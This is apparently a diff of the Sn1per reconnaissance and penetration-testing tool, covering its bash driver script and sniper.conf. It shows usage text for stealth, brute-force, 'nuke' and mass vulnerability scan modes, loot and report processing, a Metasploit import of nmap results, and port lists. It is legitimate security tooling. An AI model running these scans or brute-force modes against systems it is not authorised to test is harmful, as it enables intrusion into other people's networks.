cp $INSTALL_DIR/sniper.conf ~/.sniper.conf 2> /dev/null
|
||||
source ~/.sniper.conf
|
||||
echo -e "$OKBLUE[*] Loaded configuration file from ~/.sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Loaded configuration file from ~/.sniper.conf $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
fi
|
||||
|
||||
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
|
||||
|
||||
function help {
|
||||
echo -e "$OKRED ____ $RESET"
|
||||
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
||||
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
|
||||
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
||||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo ""
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by @xer0dayz$RESET"
|
||||
logo
|
||||
echo ""
|
||||
echo ' [*] NORMAL MODE'
|
||||
echo ' sniper -t|--target <TARGET>'
|
||||
echo ' sniper -t <TARGET>'
|
||||
echo ""
|
||||
echo ' [*] NORMAL MODE + OSINT + RECON'
|
||||
echo ' sniper -t|--target <TARGET> -o|--osint -re|--recon'
|
||||
echo ' sniper -t <TARGET> -o -re'
|
||||
echo ""
|
||||
echo ' [*] STEALTH MODE + OSINT + RECON'
|
||||
echo ' sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon'
|
||||
echo ' sniper -t <TARGET> -m stealth -o -re'
|
||||
echo ""
|
||||
echo ' [*] DISCOVER MODE'
|
||||
echo ' sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>'
|
||||
echo ' sniper -t <CIDR> -m discover -w <WORSPACE_ALIAS>'
|
||||
echo ""
|
||||
echo ' [*] SCAN ONLY SPECIFIC PORT'
|
||||
echo ' sniper -t|--target <TARGET> -m port -p|--port <portnum>'
|
||||
echo ' sniper -t <TARGET> -m port -p <portnum>'
|
||||
echo ""
|
||||
echo ' [*] FULLPORTONLY SCAN MODE'
|
||||
echo ' sniper -t|--target <TARGET> -fp|--fullportonly'
|
||||
echo ' sniper -t <TARGET> -fp'
|
||||
echo ""
|
||||
echo ' [*] WEB MODE - PORT 80 + 443 ONLY!'
|
||||
echo ' sniper -t|--target <TARGET> -m|--mode web'
|
||||
echo ' sniper -t <TARGET> -m web'
|
||||
echo ""
|
||||
echo ' [*] HTTP WEB PORT MODE'
|
||||
echo ' sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>'
|
||||
echo ' sniper -t <TARGET> -m webporthttp -p <port>'
|
||||
echo ""
|
||||
echo ' [*] HTTPS WEB PORT MODE'
|
||||
echo ' sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>'
|
||||
echo ' sniper -t <TARGET> -m webporthttps -p <port>'
|
||||
echo ""
|
||||
echo ' [*] HTTP WEBSCAN MODE'
|
||||
echo ' sniper -t|--target <TARGET> -m|--mode webscan '
|
||||
echo ' sniper -t <TARGET> -m webscan '
|
||||
echo ""
|
||||
echo ' [*] ENABLE BRUTEFORCE'
|
||||
echo ' sniper -t|--target <TARGET> -b|--bruteforce'
|
||||
echo ' sniper -t <TARGET> -b'
|
||||
echo ""
|
||||
echo ' [*] AIRSTRIKE MODE'
|
||||
echo ' sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike'
|
||||
echo ' sniper -f targets.txt -m airstrike'
|
||||
echo ""
|
||||
echo ' [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED'
|
||||
echo ' sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>'
|
||||
echo ' sniper -f targets.txt -m nuke -w <WORKSPACE_ALIAS>'
|
||||
echo ""
|
||||
echo ' [*] MASS PORT SCAN MODE'
|
||||
echo ' sniper -f|--file <TARGET> -m|--mode massportscan'
|
||||
echo ' sniper -f targets.txt -m massportscan'
|
||||
echo ""
|
||||
echo ' [*] MASS WEB SCAN MODE'
|
||||
echo ' sniper -f|--file <TARGET> -m|--mode massweb'
|
||||
echo ' sniper -f targets.txt -m massweb'
|
||||
echo ""
|
||||
echo ' [*] MASS WEBSCAN SCAN MODE'
|
||||
echo ' sniper -f|--file <TARGET> -m|--mode masswebscan'
|
||||
echo ' sniper -f targets.txt -m masswebscan'
|
||||
echo ""
|
||||
echo ' [*] MASS VULN SCAN MODE'
|
||||
echo ' sniper -f|--file <TARGET> -m|--mode massvulnscan'
|
||||
echo ' sniper -f targets.txt -m massvulnscan'
|
||||
echo ""
|
||||
echo ' [*] PORT SCAN MODE'
|
||||
echo ' sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>'
|
||||
echo ' sniper -t <TARGET> -m port -p <PORT_NUM>'
|
||||
echo ""
|
||||
echo ' [*] LIST WORKSPACES'
|
||||
echo ' sniper --list'
|
||||
|
|
@ -127,8 +119,8 @@ function logo {
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo ""
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by @xer0dayz$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ https://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Sn1per v$VER by @xer0dayz$RESET"
|
||||
echo ""
|
||||
}
|
||||
|
||||
|
|
@ -141,11 +133,11 @@ function check_online {
|
|||
ONLINE=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
|
||||
if [ -z "$ONLINE" ]; then
|
||||
ONLINE="0"
|
||||
echo -e "$OKBLUE[*] Checking for active internet connection [$RESET${OKRED}FAIL${RESET}$OKBLUE]"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper is running in offline mode.$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Checking for active internet connection $OKBLUE[$RESET${OKRED}FAIL${RESET}$OKBLUE]"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$RESET sniper is running in offline mode.$RESET"
|
||||
else
|
||||
ONLINE="1"
|
||||
echo -e "$OKBLUE[*] Checking for active internet connection [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Checking for active internet connection $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
|
@ -161,7 +153,7 @@ function check_update {
|
|||
|
||||
function update {
|
||||
logo
|
||||
echo -e "$OKBLUE[*] Checking for updates...[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Checking for updates...$OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
if [ "$ONLINE" == "0" ]; then
|
||||
echo "You will need to download the latest release manually at https://github.com/1N3/Sn1per/"
|
||||
else
|
||||
|
|
@ -198,12 +190,12 @@ case $key in
|
|||
help
|
||||
shift # past argument
|
||||
;;
|
||||
-t|--target)
|
||||
-t)
|
||||
TARGET="$2"
|
||||
shift # past argument
|
||||
shift # past argument
|
||||
;;
|
||||
-b|--bruteforce)
|
||||
-b)
|
||||
AUTOBRUTE="1"
|
||||
shift # past argument
|
||||
;;
|
||||
|
|
@ -219,12 +211,12 @@ case $key in
|
|||
RECON="1"
|
||||
shift # past argument
|
||||
;;
|
||||
-m|--mode)
|
||||
-m)
|
||||
MODE="$2"
|
||||
shift # past argument
|
||||
shift # past argument
|
||||
;;
|
||||
-p|--port)
|
||||
-p)
|
||||
PORT="$2"
|
||||
shift # past argument
|
||||
shift # past argument
|
||||
|
|
@ -255,8 +247,8 @@ case $key in
|
|||
NOLOOT="1"
|
||||
shift # past argument
|
||||
;;
|
||||
-w|--workspace)
|
||||
WORKSPACE="$2"
|
||||
-w)
|
||||
WORKSPACE="$(echo $2 | tr / -)"
|
||||
WORKSPACE_DIR="$INSTALL_DIR/loot/workspace/$WORKSPACE"
|
||||
shift # past argument
|
||||
shift # past argument
|
||||
|
|
@ -291,7 +283,7 @@ case $key in
|
|||
;;
|
||||
-dh|--delete-host)
|
||||
echo "Removing $TARGET from $WORKSPACE"
|
||||
sed -i "/$TARGET/d" $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt $WORKSPACE_DIR/domains/targets.txt 2> /dev/null
|
||||
sed -i "/$TARGET/d" $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt $WORKSPACE_DIR/domains/targets.txt $WORKSPACE_DIR/nmap/livehosts-sorted.txt 2> /dev/null
|
||||
rm -f $WORKSPACE_DIR/screenshots/$TARGET*.jpg 2> /dev/null
|
||||
sniper --reimport -w $WORKSPACE
|
||||
exit
|
||||
|
|
@ -304,10 +296,10 @@ case $key in
|
|||
echo "cd /usr/share/sniper/loot/workspace/"
|
||||
WORKSPACE_REPORT=$LOOT_DIR/sniper-report.html
|
||||
if [ -f $WORKSPACE_REPORT ]; then
|
||||
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Loading Sn1per Professional...$RESET"
|
||||
$BROWSER $INSTALL_DIR/loot/workspace/sniper-report.html 2> /dev/null > /dev/null &
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Loading workspaces...$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Loading workspaces...$RESET"
|
||||
$BROWSER $INSTALL_DIR/loot/workspace/ 2> /dev/null > /dev/null &
|
||||
fi
|
||||
exit
|
||||
|
|
@ -350,7 +342,7 @@ function init {
|
|||
if [ ! -z $WORKSPACE_DIR ]; then
|
||||
LOOT_DIR=$WORKSPACE_DIR
|
||||
fi
|
||||
echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
mkdir -p $LOOT_DIR 2> /dev/nul
|
||||
mkdir $LOOT_DIR/domains 2> /dev/null
|
||||
mkdir $LOOT_DIR/ips 2> /dev/null
|
||||
|
|
@ -403,19 +395,19 @@ function loot {
|
|||
LOOT_DIR=$WORKSPACE_DIR
|
||||
fi
|
||||
|
||||
echo -e "$OKBLUE[*] Opening loot directory $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
echo -e "$OKBLUE[*]$RESET Opening loot directory $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
|
||||
cd $LOOT_DIR
|
||||
|
||||
if [ "$METASPLOIT_IMPORT" == "1" ]; then
|
||||
echo -e "$OKORANGE + -- --=[Starting Metasploit service...$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Starting Metasploit service...$RESET"
|
||||
/etc/init.d/metasploit start 2> /dev/null > /dev/null
|
||||
msfdb start
|
||||
echo -e "$OKORANGE + -- --=[Importing NMap XML files into Metasploit...$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Importing NMap XML files into Metasploit...$RESET"
|
||||
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;" | tee $LOOT_DIR/notes/msf-$WORKSPACE.txt
|
||||
fi
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Generating reports...$RESET"
|
||||
cd $LOOT_DIR/output 2> /dev/null
|
||||
echo -en "$OKGREEN[$OKBLUE"
|
||||
for a in `ls sniper-*.txt 2>/dev/null`;
|
||||
|
|
@ -433,8 +425,26 @@ function loot {
|
|||
echo -en "$OKGREEN]$RESET"
|
||||
echo ""
|
||||
cd ..
|
||||
echo -e "$OKORANGE + -- --=[Sorting all domains...$RESET"
|
||||
#touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
if [ "$SN1PER_SERVER" == "1" ]; then
|
||||
echo -e "$OKORANGE + -- --=[ Parsing NMap Ports... $RESET"
|
||||
echo -en "$OKGREEN[$OKBLUE"
|
||||
for TARGET in `cat $WORKSPACE_DIR/scans/updated.txt`; do
|
||||
echo -n "|"
|
||||
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
|
||||
if [ ${#HOST_UP} -ge 2 ]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
rm -f $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
|
||||
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null
|
||||
if [ ${#PORT} -ge 2 ]; then
|
||||
echo "$TARGET" >> $LOOT_DIR/nmap/openports-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
done
|
||||
done
|
||||
echo -e "$OKGREEN]$RESET"
|
||||
fi
|
||||
echo -e "$OKORANGE + -- --=[ Sorting all domains...$RESET"
|
||||
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-presorted.txt 2> /dev/null
|
||||
sed -E "s/^\.//g" $LOOT_DIR/domains/domains-all-presorted.txt | sed -E "s/^\*\.//g" | tr '[:upper:]' '[:lower:]' | sort -u > $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null
|
||||
|
|
@ -443,34 +453,60 @@ function loot {
|
|||
sed -i -E 's/address//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/domains-all-presorted2.txt $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
|
||||
echo -e "$OKORANGE + -- --=[Removing blank screenshots...$RESET"
|
||||
sort -u $LOOT_DIR/web/webhosts-unsorted.txt > $LOOT_DIR/web/webhosts-sorted.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/domains/targets-all-presorted.txt $LOOT_DIR/domains/targets-all-presorted2.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/domains/domains-all-presorted.txt $LOOT_DIR/domains/domains-all-presorted2.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/nmap/openports-unsorted.txt > $LOOT_DIR/nmap/openports-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
|
||||
cd $LOOT_DIR/web/ 2> /dev/null
|
||||
egrep -i 'HTTP/1.1 200 OK|HTTP/1.1 301 ' headers-* | cut -d':' -f1 | sed "s/headers\-http\(\|s\)\-//g" | sed "s/\.txt//g" | sort -u > webhosts-sorted.txt
|
||||
split -d -l $MAX_HOSTS -e $LOOT_DIR/web/webhosts-sorted.txt webhosts-all-sorted- 2> /dev/null
|
||||
cd $LOOT_DIR/domains/ 2> /dev/null
|
||||
split -d -l $MAX_HOSTS -e $LOOT_DIR/domains/domains-all-sorted.txt domains-all-sorted- 2> /dev/null
|
||||
cd $LOOT_DIR/nmap/ 2> /dev/null
|
||||
split -d -l $MAX_HOSTS -e $LOOT_DIR/nmap/openports-sorted.txt openports-all-sorted- 2> /dev/null
|
||||
split -d -l $MAX_HOSTS -e $LOOT_DIR/nmap/livehosts-sorted.txt livehosts-all-sorted- 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/openports-unsorted.txt 2> /dev/null
|
||||
echo -e "$OKORANGE + -- --=[ Removing blank screenshots...$RESET"
|
||||
cd $LOOT_DIR/screenshots/
|
||||
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
|
||||
cd $LOOT_DIR
|
||||
if [ -f $SNIPER_PRO ]; then
|
||||
if [ -f "$LOOT_DIR/notes/notepad.html" ]; then
|
||||
echo -n "" 2>/dev/null
|
||||
else
|
||||
cp "$INSTALL_DIR/pro/notepad.html" "$LOOT_DIR/notes/notepad.html" 2>/dev/null
|
||||
PRE_NAME=$(echo $WORKSPACE | sed "s/\./-/g")
|
||||
sed -i "s/notepad/notepad-$PRE_NAME/g" "$LOOT_DIR/notes/notepad.html" 2> /dev/null
|
||||
fi
|
||||
if [ "$SN1PER_AUTOLOAD" = "1" ]; then
|
||||
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Loading Sn1per Professional...$RESET"
|
||||
source $INSTALL_DIR/pro.sh
|
||||
$BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
|
||||
elif [ "$SN1PER_AUTOLOAD" = "0" ]; then
|
||||
echo -e "$OKORANGE + -- --=[Generating Sn1per Professional reports...$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Generating Sn1per Professional reports...$RESET"
|
||||
source $INSTALL_DIR/pro.sh
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Do you want to load Sn1per Professional (y or n)? $RESET"
|
||||
read ANS
|
||||
if [ "$ANS" == "y" ]; then
|
||||
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Loading Sn1per Professional...$RESET"
|
||||
source $INSTALL_DIR/pro.sh
|
||||
$BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Skipping report generation. $RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Skipping report generation. $RESET"
|
||||
fi
|
||||
fi
|
||||
echo -e "$OKORANGE + -- --=[ Checking scan updates...$RESET"
|
||||
UPDATED_TARGETS=$LOOT_DIR/scans/updated.txt
|
||||
rm -f $UPDATED_TARGETS 2> /dev/null
|
||||
touch $UPDATED_TARGETS 2> /dev/null
|
||||
else
|
||||
echo -e "$OKRED + -- --=[Sn1per Professional is not installed. To download Sn1per Professional, go to https://xerosecurity.com. $RESET"
|
||||
echo -e "$OKRED + -- --=[ Sn1per Professional is not installed. To download Sn1per Professional, go to https://xerosecurity.com. $RESET"
|
||||
$BROWSER https://xerosecurity.com 2> /dev/null > /dev/null &
|
||||
fi
|
||||
echo -e "$OKORANGE + -- --=[Done!$RESET"
|
||||
echo -e "$OKORANGE + -- --=[ Done!$RESET"
|
||||
}
|
||||
|
||||
if [ "$REIMPORT" = "1" ]; then
|
||||
|
|
@ -482,6 +518,7 @@ fi
|
|||
|
||||
if [ "$REIMPORT_ALL" = "1" ]; then
|
||||
if [ ! -z "$WORKSPACE_DIR" ]; then
|
||||
echo -e "$OKORANGE + -- --=[ Parsing NMap Ports... $RESET"
|
||||
sort -u $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt > $WORKSPACE_DIR/scans/updated.txt
|
||||
loot
|
||||
exit
|
||||
|
|
|
|||
35
sniper.conf
35
sniper.conf
|
|
@ -14,13 +14,15 @@ REGEX='^[0-9]+$'
|
|||
VERBOSE="0"
|
||||
AUTOBRUTE="0"
|
||||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
OSINT="1"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
# ONLINE="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
SN1PER_SERVER="0"
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
SN1PER_AUTOLOAD="1"
|
||||
MAX_HOSTS="100"
|
||||
|
||||
# DEFAULT BROWSER
|
||||
BROWSER="firefox"
|
||||
|
|
@ -49,23 +51,23 @@ CENSYS_API_SECRET=""
|
|||
HUNTERIO_KEY=""
|
||||
|
||||
# SLACK API
|
||||
SLACK_NOTIFICATIONS="1"
|
||||
SLACK_NOTIFICATIONS="0"
|
||||
SLACK_NOTIFICATIONS_THEHARVESTER="0"
|
||||
SLACK_NOTIFICATIONS_EMAIL_SECURITY="0"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="1"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="1"
|
||||
SLACK_NOTIFICATIONS_DOMAINS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_TAKEOVERS_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBOVER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SUBJACK_NEW="0"
|
||||
SLACK_NOTIFICATIONS_S3_BUCKETS="0"
|
||||
SLACK_NOTIFICATIONS_SUBNETS="0"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="1"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="1"
|
||||
SLACK_NOTIFICATIONS_DIRSEARCH_NEW="0"
|
||||
SLACK_NOTIFICATIONS_SPIDER_NEW="0"
|
||||
SLACK_NOTIFICATIONS_WHATWEB="0"
|
||||
SLACK_NOTIFICATIONS_NMAP="0"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="1"
|
||||
SLACK_NOTIFICATIONS_BRUTEFORCE="0"
|
||||
SLACK_NOTIFICATIONS_WHOIS="0"
|
||||
SLACK_NOTIFICATIONS_METAGOOFIL="0"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="1"
|
||||
SLACK_NOTIFICATIONS_ARACHNI_SCAN="0"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
|
|
@ -88,9 +90,9 @@ SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
|
|||
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
|
||||
|
||||
# PORT SCAN CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1099,1433,3306,4444,5555,5432,5555,5900,5901,6093,6095,6667,7001,8080,8888,8000,10000,49180"
|
||||
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2780,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6093,6095,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8009,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8983,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9876,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,49180,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049"
|
||||
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2780,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6093,6095,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8009,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8983,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9876,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,49180,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1099,1433,3306,4444,5000,5001,5104,5555,5432,5555,5800,5900,5901,6093,6095,6443,6667,7000,7001,7002,8009,8080,8081,8082,8089,8220,8888,8000,9080,10000,10250,49180"
|
||||
